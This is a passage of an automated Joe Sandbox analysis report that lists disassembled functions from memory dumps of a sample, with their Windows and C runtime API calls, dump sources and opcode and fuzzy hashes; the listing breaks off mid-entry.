                    Function 0041DE1A Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                    Download Yara Rule
                    APIs
                    • SetUnhandledExceptionFilter.KERNEL32(Function_0001DE26,0041D865), ref: 0041DE1F
                    Memory Dump Source
                    • Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2274362925.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: ExceptionFilterUnhandled
                    • String ID:
                    • API String ID: 3192549508-0
                    • Opcode ID: 51cd48812b4439df13a0f3206df8a36fe6e52212b02255ecc27a6e6f005f07fa
                    • Instruction ID: d263676aea725f487fdf3d31226f014b35838421964f2528433ae4ae34d6a9bc
                    • Opcode Fuzzy Hash: 51cd48812b4439df13a0f3206df8a36fe6e52212b02255ecc27a6e6f005f07fa
                    • Instruction Fuzzy Hash:
                    Function 044F81CA Relevance: 1.5, Strings: 1, Instructions: 216COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2276060867.00000000044C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044C0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_44c0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: 0
                    • API String ID: 0-4108050209
                    • Opcode ID: 34b90d6f816b0148f172a566a29f4731fc4dbb34a2dc1360e8ce98d5d1eead5a
                    • Instruction ID: 9455388eb6bc5c7c16e4844fc77491b2b7101e4b9cc5635f26d97fe0dff40024
                    • Opcode Fuzzy Hash: 34b90d6f816b0148f172a566a29f4731fc4dbb34a2dc1360e8ce98d5d1eead5a
                    • Instruction Fuzzy Hash: E4514C70700E485AEF38BAED8C947BFA799AB42304F19151FD742DF392EB12B9458215
                    Function 00437F63 Relevance: 1.5, Strings: 1, Instructions: 216COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2274362925.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: 0
                    • API String ID: 0-4108050209
                    • Opcode ID: 34b90d6f816b0148f172a566a29f4731fc4dbb34a2dc1360e8ce98d5d1eead5a
                    • Instruction ID: f5382f9c421276f8542d492ea1916ea5361962033adfc0c2c636b7b3a8a42c53
                    • Opcode Fuzzy Hash: 34b90d6f816b0148f172a566a29f4731fc4dbb34a2dc1360e8ce98d5d1eead5a
                    • Instruction Fuzzy Hash: F75137B020874856DF3C8A6888967BFE7A9AB4D304F14741FF482D7382CE5D9D4E925E
                    Function 044E4168 Relevance: 1.4, Strings: 1, Instructions: 173COMMONLIBRARYCODE
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2276060867.00000000044C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044C0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_44c0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: 4
                    • API String ID: 0-4088798008
                    • Opcode ID: 5578bbf268cf1d7a6cc11f772dbe90f91f38951ddd0f84b7ddcb6c1c960a0822
                    • Instruction ID: 1b8c0281976910367cc6d4babbb2689eb29e83fad72a9cd3ea3b8ab400c1a416
                    • Opcode Fuzzy Hash: 5578bbf268cf1d7a6cc11f772dbe90f91f38951ddd0f84b7ddcb6c1c960a0822
                    • Instruction Fuzzy Hash: 17611971E00215DFCF18CF9AC580A6EF7B1BB48315F2585AAD805AB706D730FA82CB94
                    Function 00423F01 Relevance: 1.4, Strings: 1, Instructions: 173COMMONLIBRARYCODE
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2274362925.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: 4
                    • API String ID: 0-4088798008
                    • Opcode ID: 5578bbf268cf1d7a6cc11f772dbe90f91f38951ddd0f84b7ddcb6c1c960a0822
                    • Instruction ID: c6cd45714d952f979233563584549f07c7c19bf8b831fba3fef62bfec6841815
                    • Opcode Fuzzy Hash: 5578bbf268cf1d7a6cc11f772dbe90f91f38951ddd0f84b7ddcb6c1c960a0822
                    • Instruction Fuzzy Hash: 7C611B71E00225DFCB18CF59E580A6EB7B1FB88314F65856ED905A7705C738EE82CB98
                    Function 0044795B Relevance: 1.4, Strings: 1, Instructions: 104COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2274362925.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: eD
                    • API String ID: 0-2366279415
                    • Opcode ID: 7c88e02db4234a765754f15175097bcebd66576faf20eec00640c4c3910d1e39
                    • Instruction ID: 45f08370ad33d6a5a5dbe9bbdc057a05e2f9f9cb7a1532036c372ec361790ec2
                    • Opcode Fuzzy Hash: 7c88e02db4234a765754f15175097bcebd66576faf20eec00640c4c3910d1e39
                    • Instruction Fuzzy Hash: 3221B673F204394B770CC47ECC5227DB6E1C78C541745423AE8A6EA2C1D968D917E2E4
                    Function 044C4FF7 Relevance: .7, Instructions: 701COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.2276060867.00000000044C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044C0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_44c0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: c25b9b52514627e88030b8299a058399caff8027eae5c57ee015b28b58864221
                    • Instruction ID: c1641910f5f068dbc83447083763bac080b9dc3ce95cc9405730afd006aa50db
                    • Opcode Fuzzy Hash: c25b9b52514627e88030b8299a058399caff8027eae5c57ee015b28b58864221
                    • Instruction Fuzzy Hash: BE225FB3F515145BDB0CCA5DDCA27ECB2E3AFD8218B0E813DA40AE3345EA79D9158648
                    Function 00404D90 Relevance: .7, Instructions: 701COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2274362925.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: c25b9b52514627e88030b8299a058399caff8027eae5c57ee015b28b58864221
                    • Instruction ID: c1641910f5f068dbc83447083763bac080b9dc3ce95cc9405730afd006aa50db
                    • Opcode Fuzzy Hash: c25b9b52514627e88030b8299a058399caff8027eae5c57ee015b28b58864221
                    • Instruction Fuzzy Hash: BE225FB3F515145BDB0CCA5DDCA27ECB2E3AFD8218B0E813DA40AE3345EA79D9158648
                    Function 044C4DF7 Relevance: .2, Instructions: 158COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.2276060867.00000000044C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044C0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_44c0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: ca6378edd2d52d0cdf5585e653a5a59362239698a8b3221b5371dda8c8e19298
                    • Instruction ID: 7566e6aea2b7609b42a52bfdd9c5068c732db3fe7ca54d49ce7be40ff461df27
                    • Opcode Fuzzy Hash: ca6378edd2d52d0cdf5585e653a5a59362239698a8b3221b5371dda8c8e19298
                    • Instruction Fuzzy Hash: 5851C6716087918FD759CF2D852523AFFE1BFCA201F084A9EE0E697252DB74E504CB92
                    Function 00404B90 Relevance: .2, Instructions: 158COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2274362925.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: b985da20801bfd204a6036dd6fb58e30bd5130059107cf9b0faa8c73b43c0ad2
                    • Instruction ID: a20eb2de4a617541dec334a7bf9c356fce18d28689eb61b8ad946d0d307001fc
                    • Opcode Fuzzy Hash: b985da20801bfd204a6036dd6fb58e30bd5130059107cf9b0faa8c73b43c0ad2
                    • Instruction Fuzzy Hash: AA51D4716083918FD319CF2D851523ABFF1BFCA201F084A9EE4EA97292DB74D644CB91
                    Function 04507BC2 Relevance: .1, Instructions: 104COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.2276060867.00000000044C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044C0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_44c0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 7c88e02db4234a765754f15175097bcebd66576faf20eec00640c4c3910d1e39
                    • Instruction ID: 345847e8a6a324145163d5b0c22a5bbcc982f06bbe3fd567ee3473bc5b5fce27
                    • Opcode Fuzzy Hash: 7c88e02db4234a765754f15175097bcebd66576faf20eec00640c4c3910d1e39
                    • Instruction Fuzzy Hash: B321B673F204394B770CC57E8C5227DB6E1D78C501745823AF8A6EA2C1D968D917E2E4
                    Function 04507AA2 Relevance: .1, Instructions: 81COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.2276060867.00000000044C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044C0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_44c0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 1f223567361fb13af9adf83f77c6728c27b5a0d60ed15233fd28614e74e3a708
                    • Instruction ID: 18518bd081b6e53b580ffc4ac18410cf9da15ac495dc04f3967b8ae7aec2f8bc
                    • Opcode Fuzzy Hash: 1f223567361fb13af9adf83f77c6728c27b5a0d60ed15233fd28614e74e3a708
                    • Instruction Fuzzy Hash: 82118623F30C255B675C81AD8C172BAA6D2EBDC15071F533AD826E72C4F9A4EE13D290
                    Function 04508B67 Relevance: .1, Instructions: 76COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.2276060867.00000000044C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044C0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_44c0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                    • Instruction ID: f747c5354440bf5155b2b3d8694e14dcb4c8727b3fbbcfa9110967d798be48a1
                    • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                    • Instruction Fuzzy Hash: 2711E7FF30104147D655EA3DE8B4EBAA795FBC6320B2DC67AD0814B7D8D262F244BA04
                    Function 00448900 Relevance: .1, Instructions: 76COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2274362925.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                    • Instruction ID: 71a2e1948171f35eb4da84897e33cc95cda21e849322321735f1224e5497e76f
                    • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                    • Instruction Fuzzy Hash: D4113DF720488283F6048A3ED8B46BFE795EBC632172C437FD1824B758DF2AD945950A
                    Function 0295FC4B Relevance: .1, Instructions: 61COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.2275523481.000000000295F000.00000040.00000020.00020000.00000000.sdmp, Offset: 0295F000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_295f000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                    • Instruction ID: 578777037ffec44edc123c180cdb9310581488e7475d3ae9fff651672f153828
                    • Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                    • Instruction Fuzzy Hash: EE11A172340111AFD744DF65DCC0FA673EAEB8A370B198065ED04CB756D679E841CB60
                    Function 044C0D90 Relevance: .0, Instructions: 43COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.2276060867.00000000044C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044C0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_44c0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                    • Instruction ID: 73a8cea093c2568b7821033e2b1f4c5b6e1249ef58de1357b873d7bbd2f117cd
                    • Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                    • Instruction Fuzzy Hash: FC01A77A600604CFDF61CFA4C948BAB33EAEB85215F4944AAE50697341E774B9418B90
                    Function 044FA609 Relevance: .0, Instructions: 22COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.2276060867.00000000044C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044C0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_44c0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: e6d3f81bf9612d8360929edb31d8ce1375adbaa32f41a7c69d112e79a3c508fb
                    • Instruction ID: 7d50ffe10597ed5dfd5e4e4d5bf94f7d8cd87bb3c6f63437f973e2120a152ce1
                    • Opcode Fuzzy Hash: e6d3f81bf9612d8360929edb31d8ce1375adbaa32f41a7c69d112e79a3c508fb
                    • Instruction Fuzzy Hash: AFE08C72911278EBCB15DB99C90498AF3ECEB45B08B1104ABB605E3211C270FE02C7D0
                    Function 0043A3A2 Relevance: .0, Instructions: 22COMMONLIBRARYCODE
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2274362925.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: e6d3f81bf9612d8360929edb31d8ce1375adbaa32f41a7c69d112e79a3c508fb
                    • Instruction ID: cf9eec270036c85fc86fc2dfe21c7e53f7a431bc8a1839ab1744e59f30a44776
                    • Opcode Fuzzy Hash: e6d3f81bf9612d8360929edb31d8ce1375adbaa32f41a7c69d112e79a3c508fb
                    • Instruction Fuzzy Hash: CEE08C32951238EBCB14DB89C944A8AF3ECFB48B04F6514ABB901D3210C274DE10C7D4
                    Function 0041F138 Relevance: 28.2, APIs: 15, Strings: 1, Instructions: 229COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • std::invalid_argument::invalid_argument.LIBCONCRT ref: 0041F3CB
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2274362925.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: std::invalid_argument::invalid_argument
                    • String ID: pEvents
                    • API String ID: 2141394445-2498624650
                    • Opcode ID: 27236a855b666e4e5bd3eac149ecb22a79a74c6539c6d0daf36335667c8a3df2
                    • Instruction ID: ec5f4af2191e720b375f933e814ac6687ada2e9c436967f06c552350c2c861e3
                    • Opcode Fuzzy Hash: 27236a855b666e4e5bd3eac149ecb22a79a74c6539c6d0daf36335667c8a3df2
                    • Instruction Fuzzy Hash: DE81BE35D00219DBCF14DFA9C981BEEB7B1AF44314F14446BE811A7381DB38AD8ACB59
                    Function 004245EE Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 189timeregistryCOMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • ListArray.LIBCONCRT ref: 00424648
                      • Part of subcall function 00424429: InitializeSListHead.KERNEL32(?,?,00000000,?,?), ref: 004244F5
                      • Part of subcall function 00424429: InitializeSListHead.KERNEL32(?), ref: 004244FF
                    • ListArray.LIBCONCRT ref: 0042467C
                    • Hash.LIBCMT ref: 004246E5
                    • Hash.LIBCMT ref: 004246F5
                    • InitializeSListHead.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00001001), ref: 0042478A
                    • InitializeSListHead.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00001001), ref: 00424797
                    • InitializeSListHead.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00001001), ref: 004247A4
                    • InitializeSListHead.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00001001), ref: 004247B1
                      • Part of subcall function 00429D51: std::bad_exception::bad_exception.LIBCMT ref: 00429D73
                    • RegisterWaitForSingleObject.KERNEL32(?,00000000,00427B25,?,000000FF,00000000), ref: 00424839
                    • Concurrency::details::RegisterAsyncTimerAndLoadLibrary.LIBCONCRT ref: 0042485B
                    • GetLastError.KERNEL32(0042559B,?,?,00000000,?,?), ref: 0042486D
                    • Concurrency::details::platform::__CreateTimerQueueTimer.LIBCMT ref: 0042488A
                      • Part of subcall function 0041FCBA: CreateTimerQueueTimer.KERNEL32(?,?,00000000,?,?,0042559B,00000008,?,0042488F,?,00000000,00427B16,?,7FFFFFFF,7FFFFFFF,00000000), ref: 0041FCD2
                    • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 004248B4
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2274362925.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: List$HeadInitialize$Timer$ArrayCreateHashQueueRegister$AsyncConcurrency::details::Concurrency::details::platform::__Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorLastLibraryLoadObjectSingleWaitstd::bad_exception::bad_exception
                    • String ID: LB
                    • API String ID: 2750799244-539997225
                    • Opcode ID: 8a4f9a13203044ed445ea91451dfc54ed5abade5e5072e603c62186a7f12c7b2
                    • Instruction ID: ef0eb92deb565825a4515ec48e111432acd83b2f5c02b78017a4afb90a903cfa
                    • Opcode Fuzzy Hash: 8a4f9a13203044ed445ea91451dfc54ed5abade5e5072e603c62186a7f12c7b2
                    • Instruction Fuzzy Hash: 31816EB0B11A62BAD708DF75D845BD9FBA8BF08704F50421FF42897281CBB8A564CBD5
                    Function 044FF669 Relevance: 26.4, APIs: 13, Strings: 2, Instructions: 113COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • ___free_lconv_mon.LIBCMT ref: 044FF6AD
                      • Part of subcall function 044FF246: _free.LIBCMT ref: 044FF263
                      • Part of subcall function 044FF246: _free.LIBCMT ref: 044FF275
                      • Part of subcall function 044FF246: _free.LIBCMT ref: 044FF287
                      • Part of subcall function 044FF246: _free.LIBCMT ref: 044FF299
                      • Part of subcall function 044FF246: _free.LIBCMT ref: 044FF2AB
                      • Part of subcall function 044FF246: _free.LIBCMT ref: 044FF2BD
                      • Part of subcall function 044FF246: _free.LIBCMT ref: 044FF2CF
                      • Part of subcall function 044FF246: _free.LIBCMT ref: 044FF2E1
                      • Part of subcall function 044FF246: _free.LIBCMT ref: 044FF2F3
                      • Part of subcall function 044FF246: _free.LIBCMT ref: 044FF305
                      • Part of subcall function 044FF246: _free.LIBCMT ref: 044FF317
                      • Part of subcall function 044FF246: _free.LIBCMT ref: 044FF329
                      • Part of subcall function 044FF246: _free.LIBCMT ref: 044FF33B
                    • _free.LIBCMT ref: 044FF6A2
                      • Part of subcall function 044FB0FC: HeapFree.KERNEL32(00000000,00000000,?,044FF3D7,?,00000000,?,?,?,044FF3FE,?,00000007,?,?,044FF800,?), ref: 044FB112
                      • Part of subcall function 044FB0FC: GetLastError.KERNEL32(?,?,044FF3D7,?,00000000,?,?,?,044FF3FE,?,00000007,?,?,044FF800,?,?), ref: 044FB124
                    • _free.LIBCMT ref: 044FF6C4
                    • _free.LIBCMT ref: 044FF6D9
                    • _free.LIBCMT ref: 044FF6E4
                    • _free.LIBCMT ref: 044FF706
                    • _free.LIBCMT ref: 044FF719
                    • _free.LIBCMT ref: 044FF727
                    • _free.LIBCMT ref: 044FF732
                    • _free.LIBCMT ref: 044FF76A
                    • _free.LIBCMT ref: 044FF771
                    • _free.LIBCMT ref: 044FF78E
                    • _free.LIBCMT ref: 044FF7A6
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2276060867.00000000044C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044C0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_44c0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                    • String ID: 8"F$`'F
                    • API String ID: 161543041-3117062166
                    • Opcode ID: 8bfaf0b1e3ab1cea465780dc7689ae2bf9c7475949a29504445176792e6f4866
                    • Instruction ID: bece289eb90947a9b555dc11dd0dcf1eff06cd6ca3bef91064c09fb56bbc8ba9
                    • Opcode Fuzzy Hash: 8bfaf0b1e3ab1cea465780dc7689ae2bf9c7475949a29504445176792e6f4866
                    • Instruction Fuzzy Hash: 33315B32600A41EFFF30AA3AEC45B5BB7E8EB05354F10842BE655D6661DE71B845CB14
                    Function 044DF39F Relevance: 24.2, APIs: 16, Instructions: 229COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • __EH_prolog3.LIBCMT ref: 044DF3A6
                    • std::invalid_argument::invalid_argument.LIBCONCRT ref: 044DF632
                    Memory Dump Source
                    • Source File: 00000000.00000002.2276060867.00000000044C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044C0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_44c0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: H_prolog3std::invalid_argument::invalid_argument
                    • String ID:
                    • API String ID: 1590901807-0
                    • Opcode ID: 27236a855b666e4e5bd3eac149ecb22a79a74c6539c6d0daf36335667c8a3df2
                    • Instruction ID: 431628cee26a869a0e2ec7335da9ebefdd97e0da867653478fe1d8cb4fc1c38c
                    • Opcode Fuzzy Hash: 27236a855b666e4e5bd3eac149ecb22a79a74c6539c6d0daf36335667c8a3df2
                    • Instruction Fuzzy Hash: 3581B571E002189FDF34DFA5C9A1BAEB7B4AF15314F24445BD802AB382D774B94ACB51
                    Function 0041D139 Relevance: 22.8, APIs: 9, Strings: 4, Instructions: 51libraryloaderCOMMON
                    Download Yara Rule
                    APIs
                    • InitializeCriticalSectionAndSpinCount.KERNEL32(00465720,00000FA0,?,?,0041D117), ref: 0041D145
                    • GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,0041D117), ref: 0041D150
                    • GetModuleHandleW.KERNEL32(kernel32.dll,?,?,0041D117), ref: 0041D161
                    • GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 0041D173
                    • GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 0041D181
                    • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,0041D117), ref: 0041D1A4
                    • ___scrt_fastfail.LIBCMT ref: 0041D1B5
                    • DeleteCriticalSection.KERNEL32(00465720,00000007,?,?,0041D117), ref: 0041D1C0
                    • CloseHandle.KERNEL32(00000000,?,?,0041D117), ref: 0041D1D0
                    Strings
                    • SleepConditionVariableCS, xrefs: 0041D16D
                    • api-ms-win-core-synch-l1-2-0.dll, xrefs: 0041D14B
                    • WakeAllConditionVariable, xrefs: 0041D179
                    • kernel32.dll, xrefs: 0041D15C
                    Memory Dump Source
                    • Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2274362925.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Handle$AddressCriticalModuleProcSection$CloseCountCreateDeleteEventInitializeSpin___scrt_fastfail
                    • String ID: SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                    • API String ID: 3578986977-3242537097
                    • Opcode ID: eb7f23b3963b8d1de8eebd8f77cc568860475fe5b5e112d5d50c84645813196e
                    • Instruction ID: 252a5c44d21d70e961eeb017c792f98daaed356a7d9fc3a6fd8a800735b4e431
                    • Opcode Fuzzy Hash: eb7f23b3963b8d1de8eebd8f77cc568860475fe5b5e112d5d50c84645813196e
                    • Instruction Fuzzy Hash: 82011275A40B11ABD6211B75BC0DB9B3668DB40BA3F540436FD05D23A5EAB9C840CA6E
                    Function 044F2A46 Relevance: 22.7, APIs: 15, Instructions: 231COMMON
                    Download Yara Rule
                    APIs
                    • Concurrency::details::WorkSearchContext::PreSearch.LIBCONCRT ref: 044F2A58
                      • Part of subcall function 044F2856: Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 044F2879
                    • Concurrency::details::SchedulerBase::PeriodicScan.LIBCONCRT ref: 044F2A79
                    • Concurrency::details::WorkSearchContext::CheckPriorityList.LIBCONCRT ref: 044F2A86
                    • Concurrency::details::SchedulerBase::GetNextPriorityObject.LIBCMT ref: 044F2AD4
                    • Concurrency::details::SchedulerBase::AcquireQuickCacheSlot.LIBCMT ref: 044F2B5B
                    • Concurrency::details::WorkSearchContext::QuickSearch.LIBCMT ref: 044F2B6E
                    • Concurrency::details::WorkSearchContext::SearchCacheLocal_Runnables.LIBCONCRT ref: 044F2BBB
                    Memory Dump Source
                    • Source File: 00000000.00000002.2276060867.00000000044C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044C0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_44c0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Concurrency::details::$Search$Work$Context::$Base::Scheduler$CachePriorityQuick$AcquireCheckItemItem::ListLocal_NextObjectPeriodicRunnablesScanSlot
                    • String ID:
                    • API String ID: 2530155754-0
                    • Opcode ID: bdc39f7d34777ebb482f0357ca3a1e289b937bb94ca1cabbe5f5703e13ac6664
                    • Instruction ID: bdafe461976024d6980797063263e496a50a880cd7f970763a85465995fb1992
                    • Opcode Fuzzy Hash: bdc39f7d34777ebb482f0357ca3a1e289b937bb94ca1cabbe5f5703e13ac6664
                    • Instruction Fuzzy Hash: 71817A34900249ABEF169F94CD40BBF7B71BF45308F0400DAEE506B292D7B3A956DB61
                    Function 004327DF Relevance: 22.7, APIs: 15, Instructions: 231COMMON
                    Download Yara Rule
                    APIs
                    • Concurrency::details::WorkSearchContext::PreSearch.LIBCONCRT ref: 004327F1
                      • Part of subcall function 004325EF: Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 00432612
                    • Concurrency::details::SchedulerBase::PeriodicScan.LIBCONCRT ref: 00432812
                    • Concurrency::details::WorkSearchContext::CheckPriorityList.LIBCONCRT ref: 0043281F
                    • Concurrency::details::SchedulerBase::GetNextPriorityObject.LIBCMT ref: 0043286D
